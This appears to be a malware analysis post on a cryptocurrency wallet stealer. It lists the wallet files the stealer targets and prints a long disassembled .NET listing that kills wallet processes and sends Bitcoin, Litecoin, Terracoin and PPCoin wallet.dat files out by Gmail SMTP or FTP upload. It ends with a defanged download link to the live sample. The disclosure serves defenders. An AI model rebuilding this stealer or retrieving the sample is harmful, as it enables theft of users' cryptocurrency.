Steals bitcoins from these vallets :
AppDataRoamingBitcoinwallet.dat
AppDataRoamingLitecoinwallet.dat
AppDataRoamingPPCoinwallet.dat
AppDataRoamingTerracoinwallet.dat
AppDataRoamingBitcoinwallet.dat
AppDataRoamingLitecoinwallet.dat
AppDataRoamingPPCoinwallet.dat
AppDataRoamingTerracoinwallet.dat
Uses email to transfer stealed wallets.
Some strings from the executable :
@600018e: ldarg.0
@600018f: ldc.i4.0
@6000190: callvirt 0A000052
@6000191: call 0A000053
@6000192: call 0A000054
@6000193: stloc.s V_4
@6000194: ldloc.s V_4
@6000195: ldstr ;FileSplit
@6000196: callvirt 0A000055
@6000197: brtrue.s label_0
@6000198: ret
@6000199: label_0
@600019a: ldloc.s V_4
@600019b: ldstr ;FileSplit
@600019c: ldc.i4.m1
@600019d: ldc.i4.0
@600019e: call 0A000056
@600019f: stloc.3
@60001a0: ldstr
@60001a1: stloc.s V_12
@60001a2: ldstr
@60001a3: stloc.s V_10
@60001a4: ldstr
@60001a5: stloc.s V_15
@60001a6: ldstr
@60001a7: stloc.s V_5
@60001a8: ldstr
@60001a9: stloc.s V_7
@60001aa: ldstr
@60001ab: stloc.s V_6
@60001ac: ldstr
@60001ad: stloc.s V_8
@60001ae: ldstr
@60001af: stloc.s V_11
@60001b0: ldstr
@60001b1: stloc.s V_9
@60001b2: ldstr
@60001b3: stloc.s V_14
@60001b4: ldloc.3
@60001b5: ldc.i4.1
@60001b6: ldelem.ref
@60001b7: stloc.0
@60001b8: ldloc.3
@60001b9: ldc.i4.2
@60001ba: ldelem.ref
@60001bb: stloc.1
@60001bc: ldloc.3
@60001bd: ldc.i4.3
@60001be: ldelem.ref
@60001bf: stloc.2
@60001c0: ldloc.0
@60001c1: ldstr ;HOSTNAME-
@60001c2: callvirt 0A000055
@60001c3: brfalse.s label_1
@60001c4: ldloc.0
@60001c5: stloc.s V_9
@60001c6: br.s label_6
@60001c7: label_1
@60001c8: ldloc.0
@60001c9: ldstr ;PASSWORD-
@60001ca: callvirt 0A000055
@60001cb: brfalse.s label_2
@60001cc: ldloc.0
@60001cd: stloc.s V_11
@60001ce: br.s label_6
@60001cf: label_2
@60001d0: ldloc.0
@60001d1: ldstr ;USERNAME-
@60001d2: callvirt 0A000055
@60001d3: brfalse.s label_3
@60001d4: ldloc.0
@60001d5: stloc.s V_14
@60001d6: br.s label_6
@60001d7: label_3
@60001d8: ldloc.0
@60001d9: ldstr ;EMAIL-
@60001da: callvirt 0A000055
@60001db: brfalse.s label_4
@60001dc: ldloc.0
@60001dd: stloc.s V_5
@60001de: br.s label_6
@60001df: label_4
@60001e0: ldloc.0
@60001e1: ldstr ;EMAILP-
@60001e2: callvirt 0A000055
@60001e3: brfalse.s label_5
@60001e4: ldloc.0
@60001e5: stloc.s V_7
@60001e6: br.s label_6
@60001e7: label_5
@60001e8: ldloc.0
@60001e9: ldstr ;randomshit
@60001ea: callvirt 0A000055
@60001eb: brtrue.s label_6
@60001ec: label_6
@60001ed: ldloc.1
@60001ee: ldstr ;HOSTNAME-
@60001ef: callvirt 0A000055
@60001f0: brfalse.s label_7
@60001f1: ldloc.1
@60001f2: stloc.s V_9
@60001f3: br.s label_12
@60001f4: label_7
@60001f5: ldloc.1
@60001f6: ldstr ;PASSWORD-
@60001f7: callvirt 0A000055
@60001f8: brfalse.s label_8
@60001f9: ldloc.1
@60001fa: stloc.s V_11
@60001fb: br.s label_12
@60001fc: label_8
@60001fd: ldloc.1
@60001fe: ldstr ;USERNAME-
@60001ff: callvirt 0A000055
@6000200: brfalse.s label_9
@6000201: ldloc.1
@6000202: stloc.s V_14
@6000203: br.s label_12
@6000204: label_9
@6000205: ldloc.1
@6000206: ldstr ;EMAIL-
@6000207: callvirt 0A000055
@6000208: brfalse.s label_10
@6000209: ldloc.1
@600020a: stloc.s V_5
@600020b: br.s label_12
@600020c: label_10
@600020d: ldloc.1
@600020e: ldstr ;EMAILP-
@600020f: callvirt 0A000055
@6000210: brfalse.s label_11
@6000211: ldloc.1
@6000212: stloc.s V_7
@6000213: br.s label_12
@6000214: label_11
@6000215: ldloc.1
@6000216: ldstr ;randomshit
@6000217: callvirt 0A000055
@6000218: brtrue.s label_12
@6000219: label_12
@600021a: ldloc.2
@600021b: ldstr ;HOSTNAME-
@600021c: callvirt 0A000055
@600021d: brfalse.s label_13
@600021e: ldloc.2
@600021f: stloc.s V_9
@6000220: br.s label_18
@6000221: label_13
@6000222: ldloc.2
@6000223: ldstr ;PASSWORD-
@6000224: callvirt 0A000055
@6000225: brfalse.s label_14
@6000226: ldloc.2
@6000227: stloc.s V_11
@6000228: br.s label_18
@6000229: label_14
@600022a: ldloc.2
@600022b: ldstr ;USERNAME-
@600022c: callvirt 0A000055
@600022d: brfalse.s label_15
@600022e: ldloc.2
@600022f: stloc.s V_14
@6000230: br.s label_18
@6000231: label_15
@6000232: ldloc.2
@6000233: ldstr ;EMAIL-
@6000234: callvirt 0A000055
@6000235: brfalse.s label_16
@6000236: ldloc.2
@6000237: stloc.s V_5
@6000238: br.s label_18
@6000239: label_16
@600023a: ldloc.2
@600023b: ldstr ;EMAILP-
@600023c: callvirt 0A000055
@600023d: brfalse.s label_17
@600023e: ldloc.2
@600023f: stloc.s V_7
@6000240: br.s label_18
@6000241: label_17
@6000242: ldloc.2
@6000243: ldstr ;randomshit
@6000244: callvirt 0A000055
@6000245: brtrue.s label_18
@6000246: label_18
@6000247: ldloc.s V_7
@6000248: ldstr
@6000249: ldc.i4.0
@600024a: call 0A000057
@600024b: ldc.i4.0
@600024c: beq label_31
@600024d: ldloc.s V_5
@600024e: ldstr ;EMAIL-
@600024f: ldstr
@6000250: callvirt 0A000058
@6000251: stloc.s V_6
@6000252: ldloc.s V_7
@6000253: ldstr ;EMAILP-
@6000254: ldstr
@6000255: callvirt 0A000058
@6000256: stloc.s V_8
@6000257: call 0A000059
@6000258: stloc.s V_21
@6000259: ldstr ;bitcoin-qt
@600025a: call 0A00005A
@600025b: stloc.s V_17
@600025c: ldloc.s V_17
@600025d: stloc.s V_57
@600025e: ldc.i4.0
@600025f: stloc.s V_56
@6000260: br.s label_20
@6000261: label_19
@6000262: ldloc.s V_57
@6000263: ldloc.s V_56
@6000264: ldelem.ref
@6000265: stloc.s V_16
@6000266: ldloc.s V_16
@6000267: callvirt 0A00005B
@6000268: ldloc.s V_56
@6000269: ldc.i4.1
@600026a: add.ovf
@600026b: stloc.s V_56
@600026c: label_20
@600026d: ldloc.s V_56
@600026e: ldloc.s V_57
@600026f: ldlen
@6000270: conv.ovf.i4
@6000271: blt.s label_19
@6000272: ldstr ;litecoin-qt
@6000273: call 0A00005A
@6000274: stloc.s V_18
@6000275: ldloc.s V_18
@6000276: stloc.s V_59
@6000277: ldc.i4.0
@6000278: stloc.s V_58
@6000279: br.s label_22
@600027a: label_21
@600027b: ldloc.s V_59
@600027c: ldloc.s V_58
@600027d: ldelem.ref
@600027e: stloc.s V_16
@600027f: ldloc.s V_16
@6000280: callvirt 0A00005B
@6000281: ldloc.s V_58
@6000282: ldc.i4.1
@6000283: add.ovf
@6000284: stloc.s V_58
@6000285: label_22
@6000286: ldloc.s V_58
@6000287: ldloc.s V_59
@6000288: ldlen
@6000289: conv.ovf.i4
@600028a: blt.s label_21
@600028b: ldstr ;terracoin-qt
@600028c: call 0A00005A
@600028d: stloc.s V_19
@600028e: ldloc.s V_19
@600028f: stloc.s V_61
@6000290: ldc.i4.0
@6000291: stloc.s V_60
@6000292: br.s label_24
@6000293: label_23
@6000294: ldloc.s V_61
@6000295: ldloc.s V_60
@6000296: ldelem.ref
@6000297: stloc.s V_16
@6000298: ldloc.s V_16
@6000299: callvirt 0A00005B
@600029a: ldloc.s V_60
@600029b: ldc.i4.1
@600029c: add.ovf
@600029d: stloc.s V_60
@600029e: label_24
@600029f: ldloc.s V_60
@60002a0: ldloc.s V_61
@60002a1: ldlen
@60002a2: conv.ovf.i4
@60002a3: blt.s label_23
@60002a4: ldstr ;ppcoin-qt
@60002a5: call 0A00005A
@60002a6: stloc.s V_20
@60002a7: ldloc.s V_20
@60002a8: stloc.s V_63
@60002a9: ldc.i4.0
@60002aa: stloc.s V_62
@60002ab: br.s label_26
@60002ac: label_25
@60002ad: ldloc.s V_63
@60002ae: ldloc.s V_62
@60002af: ldelem.ref
@60002b0: stloc.s V_16
@60002b1: ldloc.s V_16
@60002b2: callvirt 0A00005B
@60002b3: ldloc.s V_62
@60002b4: ldc.i4.1
@60002b5: add.ovf
@60002b6: stloc.s V_62
@60002b7: label_26
@60002b8: ldloc.s V_62
@60002b9: ldloc.s V_63
@60002ba: ldlen
@60002bb: conv.ovf.i4
@60002bc: blt.s label_25
@60002bd: ldstr ;c:Users
@60002be: ldloc.s V_21
@60002bf: ldstr ;AppDataRoamingBitcoinwallet.dat
@60002c0: call 0A00005C
@60002c1: call 0A00005D
@60002c2: brfalse label_27
@60002c3: newobj System.Void System.Net.Mail.SmtpClient.ctor()
@60002c4: stloc.s V_25
@60002c5: newobj System.Void System.Net.Mail.MailMessage.ctor()
@60002c6: stloc.s V_23
@60002c7: ldloc.s V_25
@60002c8: ldloc.s V_6
@60002c9: ldloc.s V_8
@60002ca: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@60002cb: callvirt 0A000061
@60002cc: ldloc.s V_25
@60002cd: ldc.i4 587
@60002ce: callvirt 0A000062
@60002cf: ldloc.s V_25
@60002d0: ldstr ;smtp.gmail.com
@60002d1: callvirt 0A000063
@60002d2: ldloc.s V_25
@60002d3: ldc.i4.1
@60002d4: callvirt 0A000064
@60002d5: newobj System.Void System.Net.Mail.MailMessage.ctor()
@60002d6: stloc.s V_23
@60002d7: ldstr ;C:Users
@60002d8: ldloc.s V_21
@60002d9: ldstr ;AppDataRoamingBitcoinwallet.dat
@60002da: call 0A00005C
@60002db: stloc.s V_24
@60002dc: ldloc.s V_24
@60002dd: newobj System.Void System.Net.Mail.Attachment.ctor(System.String)
@60002de: stloc.s V_22
@60002df: ldloc.s V_23
@60002e0: stloc.s V_64
@60002e1: ldloc.s V_64
@60002e2: ldloc.s V_6
@60002e3: newobj System.Void System.Net.Mail.MailAddress.ctor(System.String)
@60002e4: callvirt 0A000067
@60002e5: ldloc.s V_64
@60002e6: callvirt 0A000068
@60002e7: ldloc.s V_6
@60002e8: callvirt 0A000069
@60002e9: ldloc.s V_64
@60002ea: ldstr ;CryptoCurrencies Wallet Stealer – Bitcoin Wallet from
@60002eb: ldloc.s V_21
@60002ec: call 0A00006A
@60002ed: callvirt 0A00006B
@60002ee: ldloc.s V_64
@60002ef: ldstr ;You can download the bitcoin wallet from
@60002f0: ldloc.s V_21
@60002f1: call 0A00006A
@60002f2: callvirt 0A00006C
@60002f3: ldloc.s V_64
@60002f4: callvirt 0A00006D
@60002f5: ldloc.s V_22
@60002f6: callvirt 0A00006E
@60002f7: ldnull
@60002f8: stloc.s V_64
@60002f9: ldloc.s V_25
@60002fa: ldloc.s V_23
@60002fb: callvirt 0A00006F
@60002fc: label_27
@60002fd: ldstr ;c:Users
@60002fe: ldloc.s V_21
@60002ff: ldstr ;AppDataRoamingLitecoinwallet.dat
@6000300: call 0A00005C
@6000301: call 0A00005D
@6000302: brfalse label_28
@6000303: newobj System.Void System.Net.Mail.SmtpClient.ctor()
@6000304: stloc.s V_29
@6000305: newobj System.Void System.Net.Mail.MailMessage.ctor()
@6000306: stloc.s V_27
@6000307: ldloc.s V_29
@6000308: ldloc.s V_6
@6000309: ldloc.s V_8
@600030a: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@600030b: callvirt 0A000061
@600030c: ldloc.s V_29
@600030d: ldc.i4 587
@600030e: callvirt 0A000062
@600030f: ldloc.s V_29
@6000310: ldstr ;smtp.gmail.com
@6000311: callvirt 0A000063
@6000312: ldloc.s V_29
@6000313: ldc.i4.1
@6000314: callvirt 0A000064
@6000315: newobj System.Void System.Net.Mail.MailMessage.ctor()
@6000316: stloc.s V_27
@6000317: ldstr ;C:Users
@6000318: ldloc.s V_21
@6000319: ldstr ;AppDataRoamingLitecoinwallet.dat
@600031a: call 0A00005C
@600031b: stloc.s V_28
@600031c: ldloc.s V_28
@600031d: newobj System.Void System.Net.Mail.Attachment.ctor(System.String)
@600031e: stloc.s V_26
@600031f: ldloc.s V_27
@6000320: stloc.s V_65
@6000321: ldloc.s V_65
@6000322: ldloc.s V_6
@6000323: newobj System.Void System.Net.Mail.MailAddress.ctor(System.String)
@6000324: callvirt 0A000067
@6000325: ldloc.s V_65
@6000326: callvirt 0A000068
@6000327: ldloc.s V_6
@6000328: callvirt 0A000069
@6000329: ldloc.s V_65
@600032a: ldstr ;CryptoCurrencies Wallet Stealer – Litecoin Wallet from
@600032b: ldloc.s V_21
@600032c: call 0A00006A
@600032d: callvirt 0A00006B
@600032e: ldloc.s V_65
@600032f: ldstr ;You can download the Litecoin wallet from
@6000330: ldloc.s V_21
@6000331: call 0A00006A
@6000332: callvirt 0A00006C
@6000333: ldloc.s V_65
@6000334: callvirt 0A00006D
@6000335: ldloc.s V_26
@6000336: callvirt 0A00006E
@6000337: ldnull
@6000338: stloc.s V_65
@6000339: ldloc.s V_29
@600033a: ldloc.s V_27
@600033b: callvirt 0A00006F
@600033c: label_28
@600033d: ldstr ;c:Users
@600033e: ldloc.s V_21
@600033f: ldstr ;AppDataRoamingTerracoinwallet.dat
@6000340: call 0A00005C
@6000341: call 0A00005D
@6000342: brfalse label_29
@6000343: newobj System.Void System.Net.Mail.SmtpClient.ctor()
@6000344: stloc.s V_33
@6000345: newobj System.Void System.Net.Mail.MailMessage.ctor()
@6000346: stloc.s V_31
@6000347: ldloc.s V_33
@6000348: ldloc.s V_6
@6000349: ldloc.s V_8
@600034a: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@600034b: callvirt 0A000061
@600034c: ldloc.s V_33
@600034d: ldc.i4 587
@600034e: callvirt 0A000062
@600034f: ldloc.s V_33
@6000350: ldstr ;smtp.gmail.com
@6000351: callvirt 0A000063
@6000352: ldloc.s V_33
@6000353: ldc.i4.1
@6000354: callvirt 0A000064
@6000355: newobj System.Void System.Net.Mail.MailMessage.ctor()
@6000356: stloc.s V_31
@6000357: ldstr ;C:Users
@6000358: ldloc.s V_21
@6000359: ldstr ;AppDataRoamingTerracoinwallet.dat
@600035a: call 0A00005C
@600035b: stloc.s V_32
@600035c: ldloc.s V_32
@600035d: newobj System.Void System.Net.Mail.Attachment.ctor(System.String)
@600035e: stloc.s V_30
@600035f: ldloc.s V_31
@6000360: stloc.s V_66
@6000361: ldloc.s V_66
@6000362: ldloc.s V_6
@6000363: newobj System.Void System.Net.Mail.MailAddress.ctor(System.String)
@6000364: callvirt 0A000067
@6000365: ldloc.s V_66
@6000366: callvirt 0A000068
@6000367: ldloc.s V_6
@6000368: callvirt 0A000069
@6000369: ldloc.s V_66
@600036a: ldstr ;CryptoCurrencies Wallet Stealer – Terracoin Wallet from
@600036b: ldloc.s V_21
@600036c: call 0A00006A
@600036d: callvirt 0A00006B
@600036e: ldloc.s V_66
@600036f: ldstr ;You can download the Terracoin wallet from
@6000370: ldloc.s V_21
@6000371: call 0A00006A
@6000372: callvirt 0A00006C
@6000373: ldloc.s V_66
@6000374: callvirt 0A00006D
@6000375: ldloc.s V_30
@6000376: callvirt 0A00006E
@6000377: ldnull
@6000378: stloc.s V_66
@6000379: ldloc.s V_33
@600037a: ldloc.s V_31
@600037b: callvirt 0A00006F
@600037c: label_29
@600037d: ldstr ;c:Users
@600037e: ldloc.s V_21
@600037f: ldstr ;AppDataRoamingPPCoinwallet.dat
@6000380: call 0A00005C
@6000381: call 0A00005D
@6000382: brfalse label_30
@6000383: newobj System.Void System.Net.Mail.SmtpClient.ctor()
@6000384: stloc.s V_37
@6000385: newobj System.Void System.Net.Mail.MailMessage.ctor()
@6000386: stloc.s V_35
@6000387: ldloc.s V_37
@6000388: ldloc.s V_6
@6000389: ldloc.s V_8
@600038a: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@600038b: callvirt 0A000061
@600038c: ldloc.s V_37
@600038d: ldc.i4 587
@600038e: callvirt 0A000062
@600038f: ldloc.s V_37
@6000390: ldstr ;smtp.gmail.com
@6000391: callvirt 0A000063
@6000392: ldloc.s V_37
@6000393: ldc.i4.1
@6000394: callvirt 0A000064
@6000395: newobj System.Void System.Net.Mail.MailMessage.ctor()
@6000396: stloc.s V_35
@6000397: ldstr ;C:Users
@6000398: ldloc.s V_21
@6000399: ldstr ;AppDataRoamingPPCoinwallet.dat
@600039a: call 0A00005C
@600039b: stloc.s V_36
@600039c: ldloc.s V_36
@600039d: newobj System.Void System.Net.Mail.Attachment.ctor(System.String)
@600039e: stloc.s V_34
@600039f: ldloc.s V_35
@60003a0: stloc.s V_67
@60003a1: ldloc.s V_67
@60003a2: ldloc.s V_6
@60003a3: newobj System.Void System.Net.Mail.MailAddress.ctor(System.String)
@60003a4: callvirt 0A000067
@60003a5: ldloc.s V_67
@60003a6: callvirt 0A000068
@60003a7: ldloc.s V_6
@60003a8: callvirt 0A000069
@60003a9: ldloc.s V_67
@60003aa: ldstr ;CryptoCurrencies Wallet Stealer – PPCoin Wallet from
@60003ab: ldloc.s V_21
@60003ac: call 0A00006A
@60003ad: callvirt 0A00006B
@60003ae: ldloc.s V_67
@60003af: ldstr ;You can download the PPCoin wallet from
@60003b0: ldloc.s V_21
@60003b1: call 0A00006A
@60003b2: callvirt 0A00006C
@60003b3: ldloc.s V_67
@60003b4: callvirt 0A00006D
@60003b5: ldloc.s V_34
@60003b6: callvirt 0A00006E
@60003b7: ldnull
@60003b8: stloc.s V_67
@60003b9: ldloc.s V_37
@60003ba: ldloc.s V_35
@60003bb: callvirt 0A00006F
@60003bc: label_30
@60003bd: ldarg.0
@60003be: callvirt 0A000070
@60003bf: br label_44
@60003c0: label_31
@60003c1: ldloc.s V_9
@60003c2: ldstr ;HOSTNAME-
@60003c3: ldstr
@60003c4: callvirt 0A000058
@60003c5: stloc.s V_10
@60003c6: ldloc.s V_14
@60003c7: ldstr ;USERNAME-
@60003c8: ldstr
@60003c9: callvirt 0A000058
@60003ca: stloc.s V_15
@60003cb: ldloc.s V_11
@60003cc: ldstr ;PASSWORD-
@60003cd: ldstr
@60003ce: callvirt 0A000058
@60003cf: stloc.s V_12
@60003d0: ldstr ;bitcoin-qt
@60003d1: call 0A00005A
@60003d2: stloc.s V_39
@60003d3: ldloc.s V_39
@60003d4: stloc.s V_69
@60003d5: ldc.i4.0
@60003d6: stloc.s V_68
@60003d7: br.s label_33
@60003d8: label_32
@60003d9: ldloc.s V_69
@60003da: ldloc.s V_68
@60003db: ldelem.ref
@60003dc: stloc.s V_38
@60003dd: ldloc.s V_38
@60003de: callvirt 0A00005B
@60003df: ldloc.s V_68
@60003e0: ldc.i4.1
@60003e1: add.ovf
@60003e2: stloc.s V_68
@60003e3: label_33
@60003e4: ldloc.s V_68
@60003e5: ldloc.s V_69
@60003e6: ldlen
@60003e7: conv.ovf.i4
@60003e8: blt.s label_32
@60003e9: ldstr ;litecoin-qt
@60003ea: call 0A00005A
@60003eb: stloc.s V_40
@60003ec: ldloc.s V_40
@60003ed: stloc.s V_71
@60003ee: ldc.i4.0
@60003ef: stloc.s V_70
@60003f0: br.s label_35
@60003f1: label_34
@60003f2: ldloc.s V_71
@60003f3: ldloc.s V_70
@60003f4: ldelem.ref
@60003f5: stloc.s V_38
@60003f6: ldloc.s V_38
@60003f7: callvirt 0A00005B
@60003f8: ldloc.s V_70
@60003f9: ldc.i4.1
@60003fa: add.ovf
@60003fb: stloc.s V_70
@60003fc: label_35
@60003fd: ldloc.s V_70
@60003fe: ldloc.s V_71
@60003ff: ldlen
@6000400: conv.ovf.i4
@6000401: blt.s label_34
@6000402: ldstr ;terracoin-qt
@6000403: call 0A00005A
@6000404: stloc.s V_41
@6000405: ldloc.s V_41
@6000406: stloc.s V_73
@6000407: ldc.i4.0
@6000408: stloc.s V_72
@6000409: br.s label_37
@600040a: label_36
@600040b: ldloc.s V_73
@600040c: ldloc.s V_72
@600040d: ldelem.ref
@600040e: stloc.s V_38
@600040f: ldloc.s V_38
@6000410: callvirt 0A00005B
@6000411: ldloc.s V_72
@6000412: ldc.i4.1
@6000413: add.ovf
@6000414: stloc.s V_72
@6000415: label_37
@6000416: ldloc.s V_72
@6000417: ldloc.s V_73
@6000418: ldlen
@6000419: conv.ovf.i4
@600041a: blt.s label_36
@600041b: ldstr ;ppcoin-qt
@600041c: call 0A00005A
@600041d: stloc.s V_42
@600041e: ldloc.s V_42
@600041f: stloc.s V_75
@6000420: ldc.i4.0
@6000421: stloc.s V_74
@6000422: br.s label_39
@6000423: label_38
@6000424: ldloc.s V_75
@6000425: ldloc.s V_74
@6000426: ldelem.ref
@6000427: stloc.s V_38
@6000428: ldloc.s V_38
@6000429: callvirt 0A00005B
@600042a: ldloc.s V_74
@600042b: ldc.i4.1
@600042c: add.ovf
@600042d: stloc.s V_74
@600042e: label_39
@600042f: ldloc.s V_74
@6000430: ldloc.s V_75
@6000431: ldlen
@6000432: conv.ovf.i4
@6000433: blt.s label_38
@6000434: call 0A000059
@6000435: stloc.s V_43
@6000436: ldstr ;c:Users
@6000437: ldloc.s V_43
@6000438: ldstr ;AppDataRoamingBitcoinwallet.dat
@6000439: call 0A00005C
@600043a: call 0A00005D
@600043b: brfalse label_40
@600043c: ldc.i4.5
@600043d: newarr System.String
@600043e: stloc.s V_76
@600043f: ldloc.s V_76
@6000440: ldc.i4.0
@6000441: ldstr ;ftp://
@6000442: stelem.ref
@6000443: ldloc.s V_76
@6000444: ldc.i4.1
@6000445: ldloc.s V_10
@6000446: stelem.ref
@6000447: ldloc.s V_76
@6000448: ldc.i4.2
@6000449: ldstr ;/
@600044a: stelem.ref
@600044b: ldloc.s V_76
@600044c: ldc.i4.3
@600044d: ldloc.s V_43
@600044e: stelem.ref
@600044f: ldloc.s V_76
@6000450: ldc.i4.4
@6000451: ldstr ;bitcoinwallet.dat
@6000452: stelem.ref
@6000453: ldloc.s V_76
@6000454: call 0A000071
@6000455: call 0A000072
@6000456: castclass System.Net.FtpWebRequest
@6000457: stloc.s V_44
@6000458: ldloc.s V_44
@6000459: ldloc.s V_15
@600045a: ldloc.s V_12
@600045b: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@600045c: callvirt 0A000073
@600045d: ldloc.s V_44
@600045e: ldstr ;STOR
@600045f: callvirt 0A000074
@6000460: ldstr ;c:Users
@6000461: ldloc.s V_43
@6000462: ldstr ;AppDataRoamingBitcoinwallet.dat
@6000463: call 0A00005C
@6000464: call 0A000075
@6000465: stloc.s V_45
@6000466: ldloc.s V_44
@6000467: callvirt 0A000076
@6000468: stloc.s V_46
@6000469: ldloc.s V_46
@600046a: ldloc.s V_45
@600046b: ldc.i4.0
@600046c: ldloc.s V_45
@600046d: ldlen
@600046e: conv.ovf.i4
@600046f: callvirt 0A000077
@6000470: ldloc.s V_46
@6000471: callvirt 0A000078
@6000472: ldloc.s V_46
@6000473: callvirt 0A000079
@6000474: label_40
@6000475: ldstr ;c:Users
@6000476: ldloc.s V_43
@6000477: ldstr ;AppDataRoamingLitecoinwallet.dat
@6000478: call 0A00005C
@6000479: call 0A00005D
@600047a: brfalse label_41
@600047b: ldc.i4.5
@600047c: newarr System.String
@600047d: stloc.s V_76
@600047e: ldloc.s V_76
@600047f: ldc.i4.0
@6000480: ldstr ;ftp://
@6000481: stelem.ref
@6000482: ldloc.s V_76
@6000483: ldc.i4.1
@6000484: ldloc.s V_10
@6000485: stelem.ref
@6000486: ldloc.s V_76
@6000487: ldc.i4.2
@6000488: ldstr ;/
@6000489: stelem.ref
@600048a: ldloc.s V_76
@600048b: ldc.i4.3
@600048c: ldloc.s V_43
@600048d: stelem.ref
@600048e: ldloc.s V_76
@600048f: ldc.i4.4
@6000490: ldstr ;litecoinwallet.dat
@6000491: stelem.ref
@6000492: ldloc.s V_76
@6000493: call 0A000071
@6000494: call 0A000072
@6000495: castclass System.Net.FtpWebRequest
@6000496: stloc.s V_47
@6000497: ldloc.s V_47
@6000498: ldloc.s V_15
@6000499: ldloc.s V_12
@600049a: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@600049b: callvirt 0A000073
@600049c: ldloc.s V_47
@600049d: ldstr ;STOR
@600049e: callvirt 0A000074
@600049f: ldstr ;c:Users
@60004a0: ldloc.s V_43
@60004a1: ldstr ;AppDataRoamingLitecoinwallet.dat
@60004a2: call 0A00005C
@60004a3: call 0A000075
@60004a4: stloc.s V_48
@60004a5: ldloc.s V_47
@60004a6: callvirt 0A000076
@60004a7: stloc.s V_49
@60004a8: ldloc.s V_49
@60004a9: ldloc.s V_48
@60004aa: ldc.i4.0
@60004ab: ldloc.s V_48
@60004ac: ldlen
@60004ad: conv.ovf.i4
@60004ae: callvirt 0A000077
@60004af: ldloc.s V_49
@60004b0: callvirt 0A000078
@60004b1: ldloc.s V_49
@60004b2: callvirt 0A000079
@60004b3: label_41
@60004b4: ldstr ;c:Users
@60004b5: ldloc.s V_43
@60004b6: ldstr ;AppDataRoamingTerracoinwallet.dat
@60004b7: call 0A00005C
@60004b8: call 0A00005D
@60004b9: brfalse label_42
@60004ba: ldc.i4.5
@60004bb: newarr System.String
@60004bc: stloc.s V_76
@60004bd: ldloc.s V_76
@60004be: ldc.i4.0
@60004bf: ldstr ;ftp://
@60004c0: stelem.ref
@60004c1: ldloc.s V_76
@60004c2: ldc.i4.1
@60004c3: ldloc.s V_10
@60004c4: stelem.ref
@60004c5: ldloc.s V_76
@60004c6: ldc.i4.2
@60004c7: ldstr ;/
@60004c8: stelem.ref
@60004c9: ldloc.s V_76
@60004ca: ldc.i4.3
@60004cb: ldloc.s V_43
@60004cc: stelem.ref
@60004cd: ldloc.s V_76
@60004ce: ldc.i4.4
@60004cf: ldstr ;terracoinwallet.dat
@60004d0: stelem.ref
@60004d1: ldloc.s V_76
@60004d2: call 0A000071
@60004d3: call 0A000072
@60004d4: castclass System.Net.FtpWebRequest
@60004d5: stloc.s V_50
@60004d6: ldloc.s V_50
@60004d7: ldloc.s V_15
@60004d8: ldloc.s V_12
@60004d9: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@60004da: callvirt 0A000073
@60004db: ldloc.s V_50
@60004dc: ldstr ;STOR
@60004dd: callvirt 0A000074
@60004de: ldstr ;c:Users
@60004df: ldloc.s V_43
@60004e0: ldstr ;AppDataRoamingTerracoinwallet.dat
@60004e1: call 0A00005C
@60004e2: call 0A000075
@60004e3: stloc.s V_51
@60004e4: ldloc.s V_50
@60004e5: callvirt 0A000076
@60004e6: stloc.s V_52
@60004e7: ldloc.s V_52
@60004e8: ldloc.s V_51
@60004e9: ldc.i4.0
@60004ea: ldloc.s V_51
@60004eb: ldlen
@60004ec: conv.ovf.i4
@60004ed: callvirt 0A000077
@60004ee: ldloc.s V_52
@60004ef: callvirt 0A000078
@60004f0: ldloc.s V_52
@60004f1: callvirt 0A000079
@60004f2: label_42
@60004f3: ldstr ;c:Users
@60004f4: ldloc.s V_43
@60004f5: ldstr ;AppDataRoamingPPCoinwallet.dat
@60004f6: call 0A00005C
@60004f7: call 0A00005D
@60004f8: brfalse label_43
@60004f9: ldc.i4.5
@60004fa: newarr System.String
@60004fb: stloc.s V_76
@60004fc: ldloc.s V_76
@60004fd: ldc.i4.0
@60004fe: ldstr ;ftp://
@60004ff: stelem.ref
@6000500: ldloc.s V_76
@6000501: ldc.i4.1
@6000502: ldloc.s V_10
@6000503: stelem.ref
@6000504: ldloc.s V_76
@6000505: ldc.i4.2
@6000506: ldstr ;/
@6000507: stelem.ref
@6000508: ldloc.s V_76
@6000509: ldc.i4.3
@600050a: ldloc.s V_43
@600050b: stelem.ref
@600050c: ldloc.s V_76
@600050d: ldc.i4.4
@600050e: ldstr ;PPCoinwallet.dat
@600050f: stelem.ref
@6000510: ldloc.s V_76
@6000511: call 0A000071
@6000512: call 0A000072
@6000513: castclass System.Net.FtpWebRequest
@6000514: stloc.s V_53
@6000515: ldloc.s V_53
@6000516: ldloc.s V_15
@6000517: ldloc.s V_12
@6000518: newobj System.Void System.Net.NetworkCredential.ctor(System.String,System.String)
@6000519: callvirt 0A000073
@600051a: ldloc.s V_53
@600051b: ldstr ;STOR
@600051c: callvirt 0A000074
@600051d: ldstr ;c:Users
@600051e: ldloc.s V_43
@600051f: ldstr ;AppDataRoamingPPCoinwallet.dat
@6000520: call 0A00005C
@6000521: call 0A000075
@6000522: stloc.s V_54
@6000523: ldloc.s V_53
@6000524: callvirt 0A000076
@6000525: stloc.s V_55
@6000526: ldloc.s V_55
@6000527: ldloc.s V_54
@6000528: ldc.i4.0
@6000529: ldloc.s V_54
@600052a: ldlen
@600052b: conv.ovf.i4
@600052c: callvirt 0A000077
@600052d: ldloc.s V_55
@600052e: callvirt 0A000078
@600052f: ldloc.s V_55
@6000530: callvirt 0A000079
@6000531: label_43
@6000532: ldarg.0
@6000533: callvirt 0A000070
@6000534: label_44
@6000535: ret
Sample here : hxxp://80.208.230.159/windowsupdate.exe
Hosting infos :
https://whois.domaintools.com/80.208.230.159